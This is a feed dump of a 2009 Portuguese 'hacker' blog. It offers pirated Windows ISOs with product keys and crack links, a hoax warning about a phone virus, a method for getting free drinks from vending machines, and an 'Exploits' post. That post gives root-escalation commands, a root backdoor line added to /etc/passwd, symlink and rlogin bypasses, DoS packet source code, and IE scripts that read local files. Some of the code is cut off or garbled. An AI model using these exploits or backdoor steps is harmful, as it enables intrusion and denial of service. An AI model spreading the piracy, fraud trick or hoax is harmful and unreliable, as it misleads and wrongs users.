tag:blogger.com,1999:blog-88219964675991153732024-03-12T16:46:55.420-07:00Hacker LoL┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.comBlogger21125tag:blogger.com,1999:blog-8821996467599115373.post-41919150179588260912009-11-02T05:53:00.000-08:002009-11-02T05:54:27.254-08:00# HTML para Orkut.*font face=*"Nome da fonte" size="Tamanho de 1 à 7" color="Cor em Inglês ou em RGB"><br /><br />Exemplos de fontes:<br />Arial - Arial Black - Arial Narrow - Book Antiqua - Bookman Old Style - Century Gothic - Comic Sans MS - Courier - Courier New - Estrangelo Edessa - Fixedsys - Franklin Gothic Medium - Garamond - Gautami - Georgia - Haettenschweiler - Impact - Latha - Lucida - Console - Lucida Sans Unicode - Mangal - Marlett - Microsoft Sans Serif - Modern - Monotype Corsiva - MS Sans Serif - MS Serif - MV Boli - Palatino Linotype - Raavi - Roman - Script - Shruti - Small Fonts - Sylfaen - Symbol - System - Tahoma - Terminal - Times New Roman - Trebuchet MS - Tunga - Verdana - Webdings - Wingdings - Wingdings - Wingdings - WST_Czec - WST_Engl - WST_Fren - WST_Germ - WST_Ital - WST_Span - WST_Swed<br /><br />Fontes que mais utilizo:<br />mistral - mistral - mistral - onyx - vladimir script - niagara solid - tempus sans ITC - monotype corsiva - papyrus - old english text mt - palace script mt - vivaldi - rockwell - monotype corsiva - french script mt - parchment<br /><br />Negrito: Texto<br />Itálico: Texto<br />Sublinhado: Texto<br />Riscado: Texto<br />Subscrito: Texto<br />Sobscrito: Texto<br />Alinhamento:<br /><br />center, right ou left"> Texto<br /><br />Pequeno: Texto<br />Máquina de escrever: Texto<br /><br />Tabela de cores:<br /><br /><span style="font-weight:bold;">http://www.mxstudio.com.br/Conteudos/Dreamweaver/Cores.htm</span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-78193848816510758142009-11-02T05:47:00.000-08:002009-11-02T05:48:40.134-08:00Windows XP Pro Performance Edition 2009 v2 MultilingEsta é uma instalação completa do Windows XP Pro SP3 batizada de "Performance Edition 2009 v2". Você não precisa atualizar por versões anteriores. Não necessita de nenhuma validação. Funciona 100% com o Windows Update.<br /><br />Suporta todas as linguagens e todos os layouts de teclado.<br /><br />Inclui a chave do CD já no processo de instalação. Isto significa que em nenhum momento você terá de inserí-lo manualmente. Algumas pessoas usando Mac ou Virtual Machines podem precisar do serial. Veja Serial.txt incluído, caso precise dele.<br /><br />Contém todas as atualizações do Windows, desde Abril de 2009. Foi testado inúmeras vezes, não contém erros.<br /><br />Esta é a versão de x86 (32 bit).<br /><br />Como medida preventiva, foi incluído paths do Office e Windows WGA que se encontram em uma pasta chamada "TJ" no disco. Você não precisará usá-los a menos que não possa obter as atualizações.<br /><br />Foi removido a estrutura original de rede do XP. (era super antigo e desatualizado).<br />No entanto você ainda pode usá-lo. Basta baixar a versão mais recente no Microsoft.com ou Windows Update.<br /><br />Modificações:<br />. Desabilitada e eliminada as telas clássicas de instalação do Windows XP, com as informações sobre o XP e o fundo azul. Agora só é visto um fundo preto e a instalação é semelhante ao Windows 2000. Isso economiza espaço e dá mais informações durante a instalação.<br />. Não necessita de muitos requisitos de HD e RAM. Agora você pode instalar em qualquer máquina que quiser.<br />. Compressão ISO automática foi habilitada para economizar espaço.<br /><br />Patches:<br />TCP/IP Conexões Abertas = 1000 (Default 10).<br />UXTheme Patch (permite aplicar temas ao XP).<br />Windows System File Checker desativado (SFC).<br /><br />Recursos adicionais:<br />VLK Serial Number.<br />Firewall desabilidado.<br />Serviço de Restauração do Sistema desabilidado.<br />Atualizações Automáticas desabilidadas (Podem ser habilitadas).<br />Tema Padrão Clássico (Pode ser trocado pelo Luna, na qual é incluído).<br /><br />Instruções de gravação:<br />1. Grave o ISO usando um programa como IMGBurn, Nero, Alcool 120, Blindwrite, etc... (Gravar em uma velocidade lenta para não haver erros, 1 x 4 x).<br />2. Altere as configurações da BIOS (do computador que irá instalar), para que inicie o BOOT a partir da unidade de CD-ROM.<br />3. Insira o disco e reinice o computador, siga as instruções da tela e aproveite!<br /><br />Estilo: Sistema Operacionais<br />Tamanho: 279.56 mb<br />Formato: Iso<br />Idioma: Multiling<br />Hospedagem: Up-File<br /><a href="http://up-file.com/download/484ba4d6a6c3dcb21bc34c96e28d352c8"><br />Download - Up-File </a>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-67307188894114975632009-11-02T05:43:00.000-08:002009-11-02T05:49:15.752-08:00Windows 7 RC x64 7137 + Lang. Pack PT-BRCom a chegada da versão RC do Windows 7 ao grande público, a procura e fuga de informação em torno deste sistema operativo abrandou. Ainda assim sempre que surge uma nova Build esta é alvo de grande curiosidade.<br /><br />O Windows 7 Release Candidate deu um salto impressionante desde sua versão Beta Inicial. Quase todos os problemas que condenaram o Vista estão sanados ou encaminhados para isso. Ele recupera boa parte da confiança dos usuários que ficou abalada pelas falhas de seu antecessor.<br /><br />A instalação é simples e muito, muito rápida, chegando a tomar somente metade do tempo médio de instalação de outras versões do Windows. A inicialização é muito rápida e as primeiras configurações são muito simples.<br /><br /><span style="font-weight:bold;">Serial</span><br />JYDV8-H8VXG-74RPT-6BJPB-X42V4<br />D9RHV-JG8XC-C77H2-3YF6D-RYRJ9<br />7XRCQ-RPY28-YY9P8-R6HD8-84GH3<br />JYDV8-H8VXG-74RPT-6BJPB-X42V4<br />482XP-6J9WR-4JXT3-VBPP6-FQF4M<br /><br />Obs.: Só juntar com o HJ-Split e queimar a iso em um DVD e instalar<br /><br /><span style="font-weight:bold;">Estilo</span>: Sistema Operacionais<br /><span style="font-weight:bold;">Tamanho</span>: 3.195 gb<br /><span style="font-weight:bold;">Formato</span>: Iso<br /><span style="font-weight:bold;">Idioma</span>: Ingles<br /><span style="font-weight:bold;">Hospedagem</span>: 2shared<br /><a href="http://www.easy-share.com/1905720842/pt-br.rar"><br />Download Crack</a><br /><a href="http://www.easy-share.com/1905720842/pt-br.rar">Download Tradução</a><br /><br />2shared<br /><a href="http://www.2shared.com/file/6247084/a2137b7e/win7_x64_7137_wwwtherebelsbiz_TanneRiso.html">Parte 01</a> - <a href="http://www.2shared.com/file/6287094/7ef8a73e/win7_x64_7137_wwwtherebelsbiz_TanneRiso.html">Parte 02</a> - <a href="http://www.2shared.com/file/6287102/479bd375/win7_x64_7137_wwwtherebelsbiz_TanneRiso.html">Parte 03</a> - <a href="http://www.2shared.com/file/6291331/ee30730e/win7_x64_7137_wwwtherebelsbiz_TanneRiso.html">Parte 4</a>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-11636821824571293142009-11-02T05:41:00.000-08:002009-11-02T05:42:56.594-08:00Windows XP SP3 NASA 2010Windows XP SP3 NASA 2010 com SATA. Agora disponível com alta tecnologia e incríveis especificações fazer você decola como foguete ao mundo ilimitado! É totalmente estável, forte, sem erros de sistema, de segurança e 3 vezes mais rápido do que qualquer outro Windows.<br /><br />Adicionado nova tecnologia utilizada pela primeira vez para o dobro da velocidade da Internet 5 vezes mais rápido que a velocidade atual. High técnicas para aumentar a clareza VGA e efeitos de som.<br /><br />É totalmente estável, forte, sem erros de sistema, de segurança e 3 vezes mais rápido do que qualquer outro Windows.<br /><br />Configuração Minima:<br />Processador: Intel® Pentium® ou compatível com no mínimo 800 MHz<br />Memória Ram: 512 MB RAM<br />Disco Rígido: 10 GB de espaço livre em disco<br /><br /><br />Estilo: Sistema Operacional<br />Tamanho: 753 mb<br />Formato: Iso<br />Idioma: Português-BR<br />Hospedagem: Uploading<br /><br />Links para Download<br /><br /><br /><span style="font-weight:bold;">http://uploading.com/files/abeem3d4/XPNSP3S2010.By.T4ss3o.part1.rar<br />http://uploading.com/files/88aaacmf/XPNSP3S2010.By.T4ss3o.part2.rar</span><br /><br /><br />Traduçao<br /><span style="font-weight:bold;">http://www.megaupload.com/?d=C1F8CGAR</span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-19760441106305656922009-10-30T18:02:00.000-07:002009-10-30T18:04:42.795-07:00Infiltração Numa Rede Protegida WirelessCom a proliferação das oferta de redes sem-fios, as mesmas estão a aumentar dia a dia.<br /><br />Mesmo que pouco a pouco as pessoas vão tomando consciência da importância que é proteger uma rede deste tipo, " verdade? ", veremos como até a mais agressiva configuração de segurança ( encriptação WEP de 128bit's filtrado por MAC, ESSID oculto e DHCP desactivado) não será um obstáculo para um atacante com com uns determinados conhecimentos.<br /><br /><br />Conteúdo:<br /><br />* Hacking estrategia: Infiltração numa rede wireless protegidat<br />* Capitulo III: Taller de criptografía<br />* Control de Logs em GNU/LINUX<br />* Exploração das formatações Strings, capitulo III<br />* Shatter Attacks<br />* Curso de C, capitulo II<br />* FAQ, curiosidades de Gmail/Google<br /><br />Tamanho: 19.55 Mb<br />Idioma: Espanhol<br />Servidor: Megaupload<br /><br />--><span style="font-weight:bold;"><a href="http://www.megaupload.com/?d=RUJ4SCD6"> Download </a></span><--┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-15554888848574762842009-10-30T17:58:00.001-07:002009-10-30T17:58:38.170-07:00Vírus de celularPrestem atenção no Bina (identificador de chamadas do seu celular).<br /><br />Foi detectado um vírus no sistema de telefonia móvel. Todos os aparelhos celulares que operam no sistema digital podem ser infectados por esses vírus. Se você receber uma ligação e aparecer no display do celular "DISPONÍVEL" ou "AVAILABLE" (para muitos celulares digitais que possuem função de identificação de chamada), não atenda. Aperte a tecla END imediatamente. Se você atender a ligação seu telefone será infectado por esse vírus. Esse vírus apaga todas as informações IMEI e IMSI do seu aparelho, impossibilitando a conexão com a operadora. Dessa forma você terá que comprar outro aparelho.<br /><br />Essa informação foi confirmada pela Motorola e pela Nokia.Para maiores informações, favor visitar os sites da Motorola (http://www.mot.com) ou da Nokia (http://www.nokia.com).<br /><br />Até agora, já são mais de 3 milhões de aparelhos celulares infectados por esse vírus nos EUA. Você também pode checar informações no site da CNN (http://www.cnn.com). Favor repassar essa informação para todas as pessoas que você conhece que possuem aparelho celular digital.┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-7949301278382963482009-10-30T17:55:00.000-07:002009-10-30T17:57:01.668-07:00ExploitsO que são exploits?<br />A palavra mesmo já dá uma idéia do que seja... explorar... explorar o que? Explorar vunerabilidades de sistemas, saca? Tipo, se existe um bug no Outlook Express que quando você manda uma msg, pra alguem que usa ele pra receber email, com o assunto (subject) com mais de 5000 caracteres ele trava, então fazem exploits ou voce mesmo pode fazer que explora essa vunerabilidade, saca... um exploit pode ser um programa ou mesmo só o codigo dele que voce pode compilar em seu computador. Compilar é pegar seu codigo fonte e faze-lo ficar executável... programação saca.... Para que servem? Vélho, pense assim, pô, se existe um erro, a gente pode explora-lo para beneficio próprio, saca. Tipo existia um erro num sendmail aí que você podia anexar a qualquer email o próprio arquivo de senhas do servidor, então fizeram um exploit para fazer isso com mais facilidade e muito mais êxito saca... com o exploit voce precisaria apenas falar pra que email era pra enviar o arquivo de senhas e o exploit fazia o resto... essa manha do sendmail já foi arrumada a um tempão viu.... existem muito erros em programas por aí que podemos exploita-los saca... "Regras!" Não é bem uma regra, porque essa não existe pra ser quebrada. Você pode usar vários exploits que existem por aí, mas nunca em benefício do mau saca. Voce não tem o direito de usar a porra de um exploit, q uma pessoa regaço os neuronios pra faze-lo, pra chegar e derrubar um site pra o seu encher de visitas. Esse não é a ideologia de quem faz exploits, eles existem pra denunciar as inseguranças, para que pessoas usem eles para fazerem algo de bom saca... Que tal você pegar e tranferir uma grana de um politico desses aí pra uma instituiçao dessas massa... o q acha. Não se esqueça de que usando apenas exploits você não estará fazendo um ataque completamente seu, a maioria do ataque foi feito pelo carinha q fez o exploit. Crie, nao copie! Onde econtra-los? Existe alguns sites que publicam exploits, e você mesmo pode publicar o seu neles. Tipo, tem a RootShell, que é estrangeiro, mas muito bom o site, apesar de tá fraquinho hoje em dia. Tem tb o a Securenet que é Brasileiro, e muito bom por sinal, vários exploits. Mais um pouco de exploits EXPLOIT Exploits locais são programas geralmente feitos em C que explorarm a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que vc irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiaça de acesso ( desde que voce saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu desenvolvedor , o que acho importante de se saber C para vc não se dar mal , mais isso é bom pq ferra os Lahma tbm : ) . Existem varios tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que vc vai fazer é basicamente o seguinte , voce irá copiar o exploit para o provedor de sua shell e depois compilar ele , para copiar voce usa um programa de FTP e para compilar voce irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploit para a shell vamos compilar ele : Welcome to Linux 2.0.X Host Login : nirvana Password: Linux 2.0.X Host :~$ gcc -o exploit exploit.c<br /><br />--------------------<br /><br />1<br /><br />Exploits locais são programas geralmente feitos em C que exploram a vulnerabilidade de programas e sistemas para ganhar acesso root ( de administrador ) , 90% dos exploits são para sistemas Linux , os exploits locais são scripts em C que você irá rodar no servidor a partir de uma shell adquirida , os exploits locais são os melhores de se usar , pela sua variedade e confiança de acesso ( desde que você saiba o que está fazendo ) , alguns possuem pequenos trojans para dar acesso ao seu programador .<br /><br />Existem vários tipos de exploits locais , uma infinidade , cada um com sua função e seu jeito de executar . O que você vai fazer é basicamente o seguinte , você irá copiar o exploits para o provedor de sua shell e depois compilar ele , para copiar você usa um programa de FTP e para compilar você irá usar o telnet , ( use o Linux nessa operação toda ), após ter copiado o exploits para a shell vamos compilar ele :<br />Welcome to Linux 2.0.X<br /><br />Host Login : nirvana<br />Password:<br />Linux 2.0.X<br /><br />Host :~$ gcc -o exploits exploits.c < ----Compilando o Exploits.<br /><br />Depois de compilado vamos rodá-lo para ganhar acesso root .<br /><br />Host :~$ ./exploit <---Rodando o exploit no sistema.<br /><br />Depois que você rodar o exploits vai aparecer uma série de Lixos , que geralmente são os Buffer Owerflows no sistema , ai logo surgirá o prompt root :<br /><br />Host :~# <---Aqui tu ficou root no sistema , deu certo :) bah!!!<br /><br />Agora você poderá acrescentar um usuário root para que não tenha que fazer toda essa merda de novo , você pode usar o adduser e depois colocar os 0:0 de root no passwd ou fazer diretamente pelo comando echo , o que acho mais confiável .<br /><br />Host :~# echo newroot::0:1:Novo Root:/:bin/bash <<<---colocando usuário no passwd .<br /><br />Se o sistema tiver shadow você acrescenta devida linha no shadow também , depois é só se logar novamente e fazer a festa . :)<br /><br />Welcome to Linux 2.0.X<br /><br />Host Login : newroot<br />Password:<br />Linux 2.0.X<br /><br />Host :~#<br /><br />ExploitS RemotoS<br />SecuritY<br /><br />Os Exploits Remotos como já diz o próprio nome , são parecidos com os Exploits Locais , mais , não precisam de uma shell para Hackear na maquina a qual se quer Hackear , precisa é de uma base para rodá-lo , podendo ser um Linux e nunca um Windows , pois o programa é em C ou Perl e o RWindows não permite tal tarefa ; os exploits remotos exploram Bugs remotamente dando ao Hacker acesso privilegiado no sistema . O que você vai fazer é pegar o exploit , compilar ele no seu Linux e depois rodá-lo com o host ao qual vai atacar . As vulnerabilidades mais comuns usadas são as de BIND , FTP , IMAPD e POP . Você pode achar esses exploits na net , não colocarei eles aqui por motivo de segurança , ja que esta page é para fins educativos e de prevenção , e não escola de bunda mole :)<br /><br />Usando o exploits :<br /><br />Host :# gcc -o exploit exploit.c < ----Compilando o Exploit.<br />Host :# ./exploit<br />***************************<br />Exploit Remoto by Security Chaos<br />Use Exploit ./exploit host<br />***************************<br />Host :# ./exploit 127.0.0.1<br /><br />Logo que na sua maioria ele der o buffer Owerflow remotamente no sistema ele te dará o prompt root e você poderá adicionar o seu user root .<br /><br />--------------------<br /><br />2<br /><br />Exploitando:<br /><br /> 1. Logue em um sistema qualquer que você tenha um account.<br /><br /> 2. Digite no Shell:<br /> $ echo 'cp /bin/sh /tmp/rxsh;chmod 4755 /tmp/rxsh' > /tmp/rxbug<br /> $ chmod +x /tmp/rxbug<br /> $ rxvt -print-pipe /tmp/rxbug<br /> 3. No rxvt xclient:<br /> $ cat<br /> ESC[5i<br /> ESC[4i<br /> <br /> 4. $ /tmp/rxsh<br /> # whoami<br /> root<br /> #<br /><br />------------------------------------------------------------------------------<br /> <br /> O problema do KILL MOUSE/STARTMOUSE, este comando esta na parte<br /> dos pacotes DOOM em sistemas LINUX, ‚ só rodar estes dois scripts.<br /><br />----------------------------------startmouse.sh<br /><br />/usr/games/doom/startmouse.sh:<br />#!/bin/sh<br />if [ -r /tmp/gpmkilled ]; then<br /> /usr/bin/grep gpm /etc/rc.d/rc.local > /tmp/gpmscript<br /> /bin/sh /tmp/gpmscript; /bin/rm /tmp/gpmscript /tmp/gpmkilled<br />fi<br /><br />----------------------------------startmouse.sh<br /><br />----------------------------------killmouse.sh<br /><br />/usr/games/doom/killmouse.sh:<br />#!/bin/sh<br />if /bin/ps ax | /usr/bin/grep -v grep | /usr/bin/grep "gpm" ; then<br /> GPM_RUNNING=true; /bin/killall gpm; /bin/touch /tmp/gpmkilled<br />fi<br /><br />----------------------------------killmouse.sh<br /><br />$ touch /tmp/gpmkilled<br />$ /usr/games/doom/startmouse<br /><br />ps -aux | grep gpm<br />bo 1436 0.0 2.0 40 312 v03 R 16:33 0:00 grep gpm<br />root 1407 0.0 2.4 42 368 ? S 16:24 0:00 /usr/bin/gpm t ms<br /><br /><br />$ umask 0<br />$ ln -s /root/.rhosts /tmp/gpmkilled<br />$ /usr/games/doom/killmouse<br /> 1407 ? S 0:00 gpm t ms<br /><br />$ ls -l /root/.rhosts<br />-rw-rw-rw- 1 root users 0 Dec 13 16:44 /root/.rhosts<br /><br />$ echo localhost bo > /root/.rhosts<br />$ rsh -l root localhost sh -i<br />bash#<br /><br />------------------------------------------------------------------------------<br /><br /> Jaeger, abre a porta do cliente, sistema FBSD, ultrix e linux<br /> by jaeger (jaeger@dhp.com)<br /> <br /> begin prservice.c<br /><br />------------------Corte aqui<br /><br />/* modified by jaeger 12Nov1996. Duplicated slack coding style.<br /><br /><br /><br /> now takes<br /><br /> port locuser remuser [cmd]<br /><br /> port remuser passwd [cmd]<br /><br /> where port is the dst port you wish the stderr socket to connect to<br /><br /> from the server to the client machine.<br /><br /><br /><br />/* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up<br /><br /> rsh/rexec attacks. Needs to be a prog because shells strip out nulls.<br /><br /><br /><br /> args:<br /><br /> locuser remuser [cmd]<br /><br /> remuser passwd [cmd]<br /><br /><br /><br /> cmd defaults to "pwd".<br /><br /><br /><br /> ... whatever. _H*/<br /><br /><br /><br />#include<br /><br /><br /><br />/* change if you like; "id" is a good one for figuring out if you won too */<br /><br />static char cmd[] = "pwd";<br /><br /><br /><br />static char buf [256];<br /><br /><br /><br />main(argc, argv)<br /><br /> int argc;<br /><br /> char * argv[];<br /><br />{<br /><br /> register int x;<br /><br /> register int y = 0;<br /><br /> char * p;<br /><br /> char * q;<br /><br /><br /><br /> p = buf;<br /><br /> memset (buf, 0, 256);<br /><br /><br /><br /> if (! argv[1])<br /><br /> goto wrong;<br /><br /> x = strlen (argv[1]);<br /><br /> memcpy (p, argv[1], x); /* port plus null */<br /><br /> x++;<br /><br /> p += x;<br /><br /> y += x;<br /><br /><br /><br /> if (! argv[2])<br /><br /> goto wrong;<br /><br /> x = strlen (argv[2]);<br /><br /> memcpy (p, argv[2], x); /* second arg plus null */<br /><br /> x++;<br /><br /> p += x;<br /><br /> y += x;<br /><br /><br /><br /> if (! argv[3])<br /><br />---------------------Corte aqui<br /><br />------------------------------------------------------------------------------<br /><br /> Usuário pode pegar o passwd, sistema linux<br /> by Zygo Blacell (zblaxell@MIRANDA.UWATERLOO.CA)<br /> <br /> Em um diretório onde você possa escrever, entre nele e edita um<br /> arquivo unlinkavel. O problema esta em lpr(1)não olhe os<br /> diretorios com (eg. /tmp)<br /><br /> [ patch deleted]<br /><br /> D'oh! It doesn't. :(<br /><br /> Patheie o script e zaz daqui algums dias volte l e de um lpr-s<br /> <br /> mkdir /tmp/foobar<br /> ln -s /etc/passwd /tmp/foobar<br /> lpr big_huge_file<br /> lpr -r /tmp/foobar/passwd<br /><br /> rm -rf /tmp/foobar ; ln -s /etc /tmp/foobar<br /><br /> OU<br /><br /> ln -fs /home/private_file /tmp/foobar/passwd # Does this work?<br /><br /> /etc/passwd goes away.<br /><br />------------------------------------------------------------------------------<br /><br /> Usuário loga como ROOT, sistema linux<br /> by Ken Weaverling (weave@hopi.dtcc.edu)<br /><br /> Em alguns sistemas antigos de Linux existem um bug muito escroto,<br /> onde ‚ so colocao alguns sinais que vc loga como ROOT...<br /><br /> No sistema Slackware 2.3/ kernel 1.2.13. ‚ só digitar quando vc<br /> for logar pelo telnet...<br /><br /> '+::0:0:::'<br /><br /> Sacou ‚ isto mesmo ‚ s¢ digitar no password '+::0:0:::'<br /><br />------------------------------------------------------------------------------<br /><br /> Rlogin, usuário loga como ROOT, sistema AIX e<br /> Linux (Slackware 3.1, Redhat 2.0-2.1) autor desconhecido bug<br /> retirado da ROOTSHELL<br /><br /> :<br /> % rlogin haxored.net -l -froot<br /> #<br /><br />------------------------------------------------------------------------------<br /><br /> ip_fragment.c, não sei o que faz ainda não testei, sistema<br /> Linux 2.0.33 remandado por Michal Zalewski<br /> <br /><br />----------------------ip_fragment.c<br /><br /> if(len>65535)<br /> {<br />- printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr));<br />+ NETDEBUG(printk("Oversized IP packet from %s.\n", in_ntoa(qp->iph->saddr)));<br /> ip_statistics.IpReasmFails++;<br /> ip_free(qp);<br /> return NULL;<br /><br />-------------------------------------------------------------------------<br /><br />// overdrop by lcamtuf [Linux 2.0.33 printk abuse]<br />// ------------------------------------------------<br />// based on (reaped from) teardrop by route|daemon9<br /><br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br />#include<br /><br />#define IP_MF 0x2000<br />#define IPH 0x14<br />#define UDPH 0x8<br />#define PADDING 0x1c<br />#define MAGIC 0x3<br />#define COUNT 0xBEEF<br />#define FRAG2 0xFFFF<br /><br />void usage(char *name) {<br /> fprintf(stderr,"%s dst_ip [ -n how_many ] [ -s src_ip ] [ -x ] (use -x for express delivery).\n",name);<br /> exit(0);<br />}<br /><br />u_long name_resolve(char *host_name) {<br /> struct in_addr addr;<br /> struct hostent *host_ent;<br /> if ((addr.s_addr=inet_addr(host_name))==-1) {<br /> if (!(host_ent=gethostbyname(host_name))) return (0);<br /> bcopy(host_ent->h_addr,(char *)&addr.s_addr,host_ent->h_length);<br /> }<br /> return (addr.s_addr);<br />}<br /><br /><br />void send_frags(int sock,u_long src_ip,u_long dst_ip,u_short src_prt,u_short dst_prt) {<br /> u_char *packet=NULL,*p_ptr=NULL;<br /> u_char byte;<br /> struct sockaddr_in sin;<br /> sin.sin_family=AF_INET;<br /> sin.sin_port=src_prt;<br /> sin.sin_addr.s_addr=dst_ip;<br /> packet=(u_char *)malloc(IPH+UDPH+PADDING);<br /> p_ptr=packet;<br /> bzero((u_char *)p_ptr,IPH+UDPH+PADDING);<br /> byte=0x45;<br /> memcpy(p_ptr,&byte,sizeof(u_char));<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)=htons(IPH+UDPH+PADDING);<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)=htons(242);<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)|=htons(IP_MF);<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)=0x40;<br /> byte=IPPROTO_UDP;<br /> memcpy(p_ptr+1,&byte,sizeof(u_char));<br /> p_ptr+=4;<br /> *((u_long *)p_ptr)=src_ip;<br /> p_ptr+=4;<br /> *((u_long *)p_ptr)=dst_ip;<br /> p_ptr+=4;<br /> *((u_short *)p_ptr)=htons(src_prt);<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)=htons(dst_prt);<br /> p_ptr+=2;<br /> *((u_short *)p_ptr)=htons(8+PADDING);<br /> if (sendto(sock,packet,IPH+UDPH+PADDING,0,(struct sockaddr *)&sin,<br /> sizeof(struct sockaddr))==-1) {<br /> perror("\nsendto");<br /> free(packet);<br /> exit(1);<br /> }<br /> p_ptr=&packet[2];<br /> *((u_short *)p_ptr)=htons(IPH+MAGIC+1);<br /> p_ptr+=4;<br /> *((u_short *)p_ptr)=htons(FRAG2);<br /> if (sendto(sock,packet,IPH+MAGIC+1,0,(struct sockaddr *)&sin,<br /> sizeof(struct sockaddr))==-1) {<br /> perror("\nsendto");<br /> free(packet);<br /> exit(1);<br /> }<br /> free(packet);<br />}<br /><br /><br />int main(int argc, char **argv) {<br /> int one=1,count=0,i,rip_sock,lag=500;<br /> u_long src_ip=0,dst_ip=0;<br /> u_short src_prt=0,dst_prt=0;<br /> struct in_addr addr;<br /> fprintf(stderr,"overdrop by lcamtuf [based on teardrop by route|daemon9]\n\n");<br /> if((rip_sock=socket(AF_INET,SOCK_RAW,IPPROTO_RAW))<0) {<br /> perror("raw socket");<br /> exit(1);<br /> }<br /> if (setsockopt(rip_sock,IPPROTO_IP,IP_HDRINCL,(char *)&one,sizeof(one))<0) {<br /> perror("IP_HDRINCL");<br /> exit(1);<br /> }<br /> if (argc < 2) usage(argv[0]);<br /> if (!(dst_ip=name_resolve(argv[1]))) {<br /> fprintf(stderr,"Can't resolve destination address.\n");<br /> exit(1);<br /> }<br /> while ((i=getopt(argc,argv,"s:n:x"))!=EOF) {<br /> switch (i) {<br /> case 'n':<br /> count = atoi(optarg);<br /> break;<br /> case 's':<br /> if (!(src_ip=name_resolve(optarg))) {<br /> fprintf(stderr,"Can't resolve source address.\n");<br /> exit(1);<br /> }<br /> break;<br /> case 'x':<br /> lag=0;<br /> break;<br /> default:<br /> usage(argv[0]);<br /> break;<br /> }<br /> }<br /> srandom((unsigned)(time((time_t)0)));<br /> if (!count) count=COUNT;<br /> fprintf(stderr,"Sending oversized packets:\nFrom: ");<br /> if (!src_ip) fprintf(stderr," (random)"); else {<br /> addr.s_addr = src_ip;<br /> fprintf(stderr,"%15s",inet_ntoa(addr));<br /> }<br /> addr.s_addr = dst_ip;<br /> fprintf(stderr,"\n To: %15s\n",inet_ntoa(addr));<br /> fprintf(stderr," Amt: %5d\n",count);<br /> fprintf(stderr,"[ ");<br /> for (i=0;i<><><><><><><><><><><><><>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-66538005957141356722009-10-30T17:54:00.001-07:002009-10-30T17:54:38.170-07:00Refri de graça<span style="font-weight:bold;"># Primeiro, você tem que pegar uma moeda ou nota de um real para por na máquina de refrigerante. Ai você escolhe o refrigerante que você quer ,(exemplo: coca), você segura o botão da coca, assim que a máquina engolir a sua nota você segura o botão da coca (exemplo) e fica apertando outro botão de outro refri (exemplo: fanta), mais segure o botão da coca e aperte rapidamente o botão da fanta, dependendo da sua agilidade você poderá conseguir todas as fantas que a máquina contém para "vender"<br /><br />#</span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-85032902126471876632009-10-30T17:53:00.001-07:002009-10-30T17:53:40.137-07:00Buggs do ExplorerHeHe é vc pode fazer cada coisa com o cara que estiver usando o explorer que vc nem imagina, dá até pra ver o autoexec do cara. A Micro$oft com a pressa de seus lançamentos fez cada burrada no explorer que descoberta por hackers fez com que desse para explorar todas as falhas com simples scripts. Se vc quer se defender vc tem que tirar o explorer 4.x ou inferior, no 5 as falhas diminuiram bastante mas se vc quer nenhuma falha use o Netscape ou o Opera que são excelentes navegadores. Aí está as falhas do IE:<br /><br />#BUG 1#<br />#Esse bug no IE 4, faz com que em 5 segundos o conteudo<br />do<br />AUTOEXEC.BAT seja mostrado numa caixa de texto.<br />Demostrando q se esse<br />script<br />for usado para fins maliciosos, dados importantes podem<br />ser capturados.#<br />*HTML*<br />*HEAD*<br />*TITLE*<br />*/TITLE*<br />*/HEAD*<br />*BODY onLoad="init()"*<br />*SCRIPT LANGUAGE="JavaScript"*<br />function init()<br />{<br />document.all("MyFrame1").src = 'file://c:/autoexec.bat';<br />setTimeout ('getLinks()', 5000);<br />}<br /><br />function getLinks()<br />{alert(document.all("MyFrame1").document.body.outerHTML);<br />}<br /><br />*/SCRIPT*<br />*IFRAME STYLE="width=1px; height=1px;" NAME="MyFrame1"<br />SRC="blank.html"*<br />*/BODY*<br />*/HTML*<br /><br />-----------------------------------------------<br /><br />BUG 2#<br />Faz com que o IE entre em loop, abrindo a pagina bug.htm<br />infinitamente. Causando o seu travamento.<br />*HTML*<br />*HEAD*<br />*TITLE*<br />*/TITLE*<br />*/HEAD*<br />*FRAMESET ROWS = 50%,50%* v<br />*FRAME SRC = "bug.htm"*<br />*FRAME SRC = "bug.htm"*<br /><br />*/FRAMESET*<br /><br /><br /><br />*BODY*<br />*/BODY><br />*/HTML><br /><br />------------------------------------------<br /><br />#BUG 3# Vulnerable : IE 4.x e VBScript Engine 3.x<br />Descricao: Com essa falha de seguranca na linguagem VBScript, vc<br />pode<br />rodar scripts maliciosos para sobreescrever arquivos.<br />*HTML><br />*HEAD> 